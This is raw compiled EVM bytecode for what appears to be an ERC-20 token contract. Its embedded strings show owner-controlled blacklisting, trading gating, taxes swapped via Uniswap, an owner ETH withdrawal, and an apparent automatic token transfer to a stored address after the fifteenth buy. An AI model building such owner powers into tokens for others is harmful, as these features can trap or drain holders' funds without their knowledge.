0x608060405260043610610228575f3560e01c80638da5cb5b11610122578063c9567bf9116100aa578063dd8546521161006e578063dd854652146107e3578063e2f456051461080d578063f2fde38b14610837578063f8b45b051461085f578063ffb54a99146108895761022f565b8063c9567bf914610713578063ca70307514610729578063cf9522fd14610753578063d20c50d51461077d578063dd62ed3e146107a75761022f565b8063a457c2d7116100f1578063a457c2d714610621578063a9059cbb1461065d578063afa4f3b214610699578063c0246668146106c1578063c8c8ebe4146106e95761022f565b80638da5cb5b1461056957806395d89b411461059357806397682884146105bd5780639a7a23d6146105f95761022f565b806339509351116101b0578063715018a611610174578063715018a6146104d7578063751039fc146104ed5780637571336a14610503578063881dce601461052b57806389291a8f146105535761022f565b806339509351146103cf5780634fbee1931461040b578063583e0568146104475780636ddd17131461047157806370a082311461049b5761022f565b806318160ddd116101f757806318160ddd146102d95780632315bf141461030357806323b872dd1461033f578063311028af1461037b578063313ce567146103a55761022f565b806306fdde0314610233578063095ea7b31461025d5780630c6b6737146102995780630f054c06146102c35761022f565b3661022f57005b5f80fd5b34801561023e575f80fd5b506102476108b3565b6040516102549190612cca565b60405180910390f35b348015610268575f80fd5b50610283600480360381019061027e9190612d7b565b610943565b6040516102909190612dd3565b60405180910390f35b3480156102a4575f80fd5b506102ad610965565b6040516102ba9190612dfb565b60405180910390f35b3480156102ce575f80fd5b506102d761096b565b005b3480156102e4575f80fd5b506102ed610996565b6040516102fa9190612dfb565b60405180910390f35b34801561030e575f80fd5b5061032960048036038101906103249190612e14565b61099f565b6040516103369190612dd3565b60405180910390f35b34801561034a575f80fd5b5061036560048036038101906103609190612e3f565b6109f1565b6040516103729190612dd3565b60405180910390f35b348015610386575f80fd5b5061038f610a1f565b60405161039c9190612dfb565b60405180910390f35b3480156103b0575f80fd5b506103b9610a25565b6040516103c69190612eaa565b60405180910390f35b3480156103da575f80fd5b506103f560048036038101906103f09190612d7b565b610a2d565b6040516104029190612dd3565b60405180910390f35b348015610416575f80fd5b50610431600480360381019061042c9190612e14565b610a63565b60405161043e9190612dd3565b60405180910390f35b348015610452575f80fd5b5061045b610ab5565b6040516104689190612f1e565b60405180910390f35b34801561047c575f80fd5b50610485610ad9565b6040516104929190612dd3565b60405180910390f35b3480156104a6575f80fd5b506104c160048036038101906104bc9190612e14565b610aec565b6040516104ce9190612dfb565b60405180910390f35b3480156104e2575f80fd5b506104eb610b31565b005b3480156104f8575f80fd5b50610501610b44565b005b34801561050e575f80fd5b5061052960048036038101906105249190612f61565b610b68565b005b348015610536575f80fd5b50610551600480360381019061054c9190612f9f565b610bc8565b005b34801561055e575f80fd5b50610567610cab565b005b348015610574575f80fd5b5061057d610d3b565b60405161058a9190612fd9565b60405180910390f35b34801561059e575f80fd5b506105a7610d63565b6040516105b49190612cca565b60405180910390f35b3480156105c8575f80fd5b506105e360048036038101906105de9190612e14565b610df3565b6040516105f09190612dd3565b60405180910390f35b348015610604575f80fd5b5061061f600480360381019061061a9190612f61565b610e10565b005b34801561062c575f80fd5b5061064760048036038101906106429190612d7b565b610eb5565b6040516106549190612dd3565b60405180910390f35b348015610668575f80fd5b50610683600480360381019061067e9190612d7b565b610f2a565b6040516106909190612dd3565b60405180910390f35b3480156106a4575f80fd5b506106bf60048036038101906106ba9190612f9f565b610f4c565b005b3480156106cc575f80fd5b506106e760048036038101906106e29190612f61565b610f71565b005b3480156106f4575f80fd5b506106fd61101f565b60405161070a9190612dfb565b60405180910390f35b34801561071e575f80fd5b50610727611025565b005b348015610734575f80fd5b5061073d611559565b60405161074a9190612dfb565b60405180910390f35b34801561075e575f80fd5b5061076761155f565b6040516107749190612dfb565b60405180910390f35b348015610788575f80fd5b50610791611565565b60405161079e9190612fd9565b60405180910390f35b3480156107b2575f80fd5b506107cd60048036038101906107c89190612ff2565b61158a565b6040516107da9190612dfb565b60405180910390f35b3480156107ee575f80fd5b506107f761160c565b6040516108049190612dfb565b60405180910390f35b348015610818575f80fd5b50610821611612565b60405161082e9190612dfb565b60405180910390f35b348015610842575f80fd5b5061085d60048036038101906108589190612e14565b611618565b005b34801561086a575f80fd5b5061087361169a565b6040516108809190612dfb565b60405180910390f35b348015610894575f80fd5b5061089d6116a0565b6040516108aa9190612dd3565b60405180910390f35b6060600380546108c29061305d565b80601f01602080910402602001604051908101604052809291908181526020018280546108ee9061305d565b80156109395780601f1061091057610100808354040283529160200191610939565b820191905f5260205f20905b81548152906001019060200180831161091c57829003601f168201915b5050505050905090565b5f8061094d6116b2565b905061095a8185856116b9565b600191505092915050565b60115481565b61097361187c565b5f61097d30610aec565b90505f811115610993576109923033836118fa565b5b50565b5f600254905090565b5f60065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f806109fb6116b2565b9050610a088582856122f1565b610a138585856118fa565b60019150509392505050565b600c5481565b5f6012905090565b5f80610a376116b2565b9050610a58818585610a49858961158a565b610a5391906130ba565b6116b9565b600191505092915050565b5f60175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b601260019054906101000a900460ff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610b3961187c565b610b425f61237c565b565b610b4c61187c565b5f610b55610996565b905080600d8190555080600e8190555050565b610b7061187c565b8060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610c086116b2565b73ffffffffffffffffffffffffffffffffffffffff1614610c27575f80fd5b5f610c30610996565b90505f610c3c30610aec565b90505f60648484610c4d91906130ed565b610c57919061315b565b905080821015610c9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c93906131d5565b60405180910390fd5b610ca58161243f565b50505050565b610cb361187c565b5f4711610cf5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cec9061323d565b60405180910390fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015610d38573d5f803e3d5ffd5b50565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610d729061305d565b80601f0160208091040260200160405190810160405280929190818152602001828054610d9e9061305d565b8015610de95780601f10610dc057610100808354040283529160200191610de9565b820191905f5260205f20905b815481529060010190602001808311610dcc57829003601f168201915b5050505050905090565b6006602052805f5260405f205f915054906101000a900460ff1681565b610e1861187c565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ea7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9e906132cb565b60405180910390fd5b610eb18282612693565b5050565b5f80610ebf6116b2565b90505f610ecc828661158a565b905083811015610f11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0890613359565b60405180910390fd5b610f1e82868684036116b9565b60019250505092915050565b5f80610f346116b2565b9050610f418185856118fa565b600191505092915050565b610f5461187c565b670de0b6b3a764000081610f6891906130ed565b600f8190555050565b610f7961187c565b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516110139190612dd3565b60405180910390a25050565b600d5481565b61102d61187c565b60125f9054906101000a900460ff161561107c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611073906133c1565b60405180910390fd5b6110a9307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600c546116b9565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b37f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016111459291906133df565b6020604051808303815f875af1158015611161573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611185919061341a565b505f7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156111f0573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906112149190613459565b90505f8173ffffffffffffffffffffffffffffffffffffffff166370a0823160095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166040518263ffffffff1660e01b81526004016112719190612fd9565b602060405180830381865afa15801561128c573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906112b09190613498565b90505f6112c96039600c5461273190919063ffffffff16565b90505f8083111561146e576112e7834761279690919063ffffffff16565b90505f61130f8261130186866127ab90919063ffffffff16565b6127c090919063ffffffff16565b905061133d3060095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16836127d5565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b81526004015f604051808303815f87803b1580156113a3575f80fd5b505af11580156113b5573d5f803e3d5ffd5b505050507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d7198330865f87611402610d3b565b426040518863ffffffff1660e01b8152600401611424969594939291906134fc565b60606040518083038185885af1158015611440573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190611465919061355b565b5050505061151e565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d7194730855f806114b7610d3b565b426040518863ffffffff1660e01b81526004016114d9969594939291906135ab565b60606040518083038185885af11580156114f5573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061151a919061355b565b5050505b6001601260016101000a81548160ff021916908315150217905550600160125f6101000a81548160ff02191690831515021790555050505050565b60105481565b60145481565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60135481565b600f5481565b61162061187c565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361168e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116859061367a565b60405180910390fd5b6116978161237c565b50565b600e5481565b60125f9054906101000a900460ff1681565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611727576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161171e90613708565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611795576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161178c90613796565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161186f9190612dfb565b60405180910390a3505050565b6118846116b2565b73ffffffffffffffffffffffffffffffffffffffff166118a2610d3b565b73ffffffffffffffffffffffffffffffffffffffff16146118f8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118ef906137fe565b60405180910390fd5b565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611968576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161195f9061388c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119d6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119cd9061391a565b60405180910390fd5b60065f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015611a74575060065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b611ab3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611aaa906139a8565b60405180910390fd5b60155460105410611ac75760056013819055505b60165460115410611adb5760056014819055505b5f8103611af257611aed83835f6127d5565b6122ec565b611afa610d3b565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611b685750611b38610d3b565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611ba057505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611bda575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611bf35750600b60149054906101000a900460ff16155b15611fd05760125f9054906101000a900460ff16611ce65760175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611ca6575060175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611ce5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cdc90613a10565b60405180910390fd5b5b60195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611d83575060185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611e3257600d54811115611dcd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dc490613a9e565b60405180910390fd5b600e54611dd983610aec565b82611de491906130ba565b1115611e25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e1c90613b06565b60405180910390fd5b611e2d612a41565b611fcf565b60195f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611ecf575060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611f2657600d54811115611f19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f1090613b94565b60405180910390fd5b611f21612a93565b611fce565b60185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16611fcd57600e54611f8083610aec565b82611f8b91906130ba565b1115611fcc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fc390613b06565b60405180910390fd5b5b5b5b5b5f611fda30610aec565b90505f8082119050808015611ffb5750601260019054906101000a900460ff165b80156120145750600b60149054906101000a900460ff16155b8015612067575060195f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b80156120ba575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561210d575060175f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15612151576001600b60146101000a81548160ff02191690831515021790555061213683612aac565b5f600b60146101000a81548160ff0219169083151502179055505b5f600b60149054906101000a900460ff1615905060175f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680612200575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15612209575f90505b5f81156122dc5760195f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561228e576122876064612279601454886127ab90919063ffffffff16565b6127c090919063ffffffff16565b90506122b9565b6122b660646122a8601354886127ab90919063ffffffff16565b6127c090919063ffffffff16565b90505b5f8111156122cd576122cc8730836127d5565b5b80856122d99190613bb2565b94505b6122e78787876127d5565b505050505b505050565b5f6122fc848461158a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146123765781811015612368576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161235f90613c2f565b60405180910390fd5b61237584848484036116b9565b5b50505050565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f600267ffffffffffffffff81111561245b5761245a613c4d565b5b6040519080825280602002602001820160405280156124895781602001602082028036833780820191505090505b50905030815f815181106124a05761249f613c7a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612543573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906125679190613459565b8160018151811061257b5761257a613c7a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506125e0307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d846116b9565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac947835f84600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518663ffffffff1660e01b8152600401612662959493929190613d5e565b5f604051808303815f87803b158015612679575f80fd5b505af115801561268b573d5f803e3d5ffd5b505050505050565b8060195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b5f6064821115612776576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161276d90613e26565b60405180910390fd5b6064828461278491906130ed565b61278e919061315b565b905092915050565b5f81836127a39190613bb2565b905092915050565b5f81836127b891906130ed565b905092915050565b5f81836127cd919061315b565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612843576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161283a9061388c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036128b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128a89061391a565b60405180910390fd5b6128bc838383612c36565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561293f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161293690613eb4565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051612a289190612dfb565b60405180910390a3612a3b848484612c3b565b50505050565b60105f815480929190612a5390613ed2565b9190505550600f60105403612a9157612a903060085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600f546127d5565b5b565b60115f815480929190612aa590613ed2565b9190505550565b5f612ab630610aec565b90505f808203612ac7575050612c33565b5f601454601354612ad891906130ba565b03612b52575f82118015612aed5750600f5482105b15612afa57819050612b4d565b5f612b236064612b15601454876127ab90919063ffffffff16565b6127c090919063ffffffff16565b90508084612b319190613bb2565b9350600f54841115612b4757600f549150612b4b565b8391505b505b612c27565b5f82118015612b755750612b726002600f546127c090919063ffffffff16565b82105b15612b81575050612c33565b5f82118015612ba45750612ba16002600f546127c090919063ffffffff16565b82115b8015612bb15750600f5482105b15612bd357612bcc6002600f546127c090919063ffffffff16565b9050612c26565b5f612bfc6064612bee601454876127ab90919063ffffffff16565b6127c090919063ffffffff16565b90508084612c0a9190613bb2565b9350600f54841115612c2057600f549150612c24565b8391505b505b5b612c308161243f565b50505b50565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015612c77578082015181840152602081019050612c5c565b5f8484015250505050565b5f601f19601f8301169050919050565b5f612c9c82612c40565b612ca68185612c4a565b9350612cb6818560208601612c5a565b612cbf81612c82565b840191505092915050565b5f6020820190508181035f830152612ce28184612c92565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612d1782612cee565b9050919050565b612d2781612d0d565b8114612d31575f80fd5b50565b5f81359050612d4281612d1e565b92915050565b5f819050919050565b612d5a81612d48565b8114612d64575f80fd5b50565b5f81359050612d7581612d51565b92915050565b5f8060408385031215612d9157612d90612cea565b5b5f612d9e85828601612d34565b9250506020612daf85828601612d67565b9150509250929050565b5f8115159050919050565b612dcd81612db9565b82525050565b5f602082019050612de65f830184612dc4565b92915050565b612df581612d48565b82525050565b5f602082019050612e0e5f830184612dec565b92915050565b5f60208284031215612e2957612e28612cea565b5b5f612e3684828501612d34565b91505092915050565b5f805f60608486031215612e5657612e55612cea565b5b5f612e6386828701612d34565b9350506020612e7486828701612d34565b9250506040612e8586828701612d67565b9150509250925092565b5f60ff82169050919050565b612ea481612e8f565b82525050565b5f602082019050612ebd5f830184612e9b565b92915050565b5f819050919050565b5f612ee6612ee1612edc84612cee565b612ec3565b612cee565b9050919050565b5f612ef782612ecc565b9050919050565b5f612f0882612eed565b9050919050565b612f1881612efe565b82525050565b5f602082019050612f315f830184612f0f565b92915050565b612f4081612db9565b8114612f4a575f80fd5b50565b5f81359050612f5b81612f37565b92915050565b5f8060408385031215612f7757612f76612cea565b5b5f612f8485828601612d34565b9250506020612f9585828601612f4d565b9150509250929050565b5f60208284031215612fb457612fb3612cea565b5b5f612fc184828501612d67565b91505092915050565b612fd381612d0d565b82525050565b5f602082019050612fec5f830184612fca565b92915050565b5f806040838503121561300857613007612cea565b5b5f61301585828601612d34565b925050602061302685828601612d34565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061307457607f821691505b60208210810361308757613086613030565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6130c482612d48565b91506130cf83612d48565b92508282019050808211156130e7576130e661308d565b5b92915050565b5f6130f782612d48565b915061310283612d48565b925082820261311081612d48565b915082820484148315176131275761312661308d565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61316582612d48565b915061317083612d48565b9250826131805761317f61312e565b5b828204905092915050565b7f4e6f7420656e6f75676820746f6b656e730000000000000000000000000000005f82015250565b5f6131bf601183612c4a565b91506131ca8261318b565b602082019050919050565b5f6020820190508181035f8301526131ec816131b3565b9050919050565b7f546f6b656e3a206e6f2045544820746f20636c656172000000000000000000005f82015250565b5f613227601683612c4a565b9150613232826131f3565b602082019050919050565b5f6020820190508181035f8301526132548161321b565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d205f8201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b5f6132b5603983612c4a565b91506132c08261325b565b604082019050919050565b5f6020820190508181035f8301526132e2816132a9565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f613343602583612c4a565b915061334e826132e9565b604082019050919050565b5f6020820190508181035f83015261337081613337565b9050919050565b7f54726164696e6720697320616c7265616479206f70656e0000000000000000005f82015250565b5f6133ab601783612c4a565b91506133b682613377565b602082019050919050565b5f6020820190508181035f8301526133d88161339f565b9050919050565b5f6040820190506133f25f830185612fca565b6133ff6020830184612dec565b9392505050565b5f8151905061341481612f37565b92915050565b5f6020828403121561342f5761342e612cea565b5b5f61343c84828501613406565b91505092915050565b5f8151905061345381612d1e565b92915050565b5f6020828403121561346e5761346d612cea565b5b5f61347b84828501613445565b91505092915050565b5f8151905061349281612d51565b92915050565b5f602082840312156134ad576134ac612cea565b5b5f6134ba84828501613484565b91505092915050565b5f819050919050565b5f6134e66134e16134dc846134c3565b612ec3565b612d48565b9050919050565b6134f6816134cc565b82525050565b5f60c08201905061350f5f830189612fca565b61351c6020830188612dec565b61352960408301876134ed565b6135366060830186612dec565b6135436080830185612fca565b61355060a0830184612dec565b979650505050505050565b5f805f6060848603121561357257613571612cea565b5b5f61357f86828701613484565b935050602061359086828701613484565b92505060406135a186828701613484565b9150509250925092565b5f60c0820190506135be5f830189612fca565b6135cb6020830188612dec565b6135d860408301876134ed565b6135e560608301866134ed565b6135f26080830185612fca565b6135ff60a0830184612dec565b979650505050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f613664602683612c4a565b915061366f8261360a565b604082019050919050565b5f6020820190508181035f83015261369181613658565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6136f2602483612c4a565b91506136fd82613698565b604082019050919050565b5f6020820190508181035f83015261371f816136e6565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613780602283612c4a565b915061378b82613726565b604082019050919050565b5f6020820190508181035f8301526137ad81613774565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6137e8602083612c4a565b91506137f3826137b4565b602082019050919050565b5f6020820190508181035f830152613815816137dc565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f613876602583612c4a565b91506138818261381c565b604082019050919050565b5f6020820190508181035f8301526138a38161386a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f613904602383612c4a565b915061390f826138aa565b604082019050919050565b5f6020820190508181035f830152613931816138f8565b9050919050565b7f45524332303a207472616e736665722066726f6d2f746f2074686520626c61635f8201527f6b6c697374656420616464726573730000000000000000000000000000000000602082015250565b5f613992602f83612c4a565b915061399d82613938565b604082019050919050565b5f6020820190508181035f8301526139bf81613986565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f6139fa601683612c4a565b9150613a05826139c6565b602082019050919050565b5f6020820190508181035f830152613a27816139ee565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f613a88603583612c4a565b9150613a9382613a2e565b604082019050919050565b5f6020820190508181035f830152613ab581613a7c565b9050919050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f613af0601383612c4a565b9150613afb82613abc565b602082019050919050565b5f6020820190508181035f830152613b1d81613ae4565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b5f613b7e603683612c4a565b9150613b8982613b24565b604082019050919050565b5f6020820190508181035f830152613bab81613b72565b9050919050565b5f613bbc82612d48565b9150613bc783612d48565b9250828203905081811115613bdf57613bde61308d565b5b92915050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f613c19601d83612c4a565b9150613c2482613be5565b602082019050919050565b5f6020820190508181035f830152613c4681613c0d565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b613cd981612d0d565b82525050565b5f613cea8383613cd0565b60208301905092915050565b5f602082019050919050565b5f613d0c82613ca7565b613d168185613cb1565b9350613d2183613cc1565b805f5b83811015613d51578151613d388882613cdf565b9750613d4383613cf6565b925050600181019050613d24565b5085935050505092915050565b5f60a082019050613d715f830188612dec565b613d7e60208301876134ed565b8181036040830152613d908186613d02565b9050613d9f6060830185612fca565b613dac6080830184612dec565b9695505050505050565b7f50657263656e74616765206d757374206265206265747765656e203020616e645f8201527f2031303000000000000000000000000000000000000000000000000000000000602082015250565b5f613e10602483612c4a565b9150613e1b82613db6565b604082019050919050565b5f6020820190508181035f830152613e3d81613e04565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f613e9e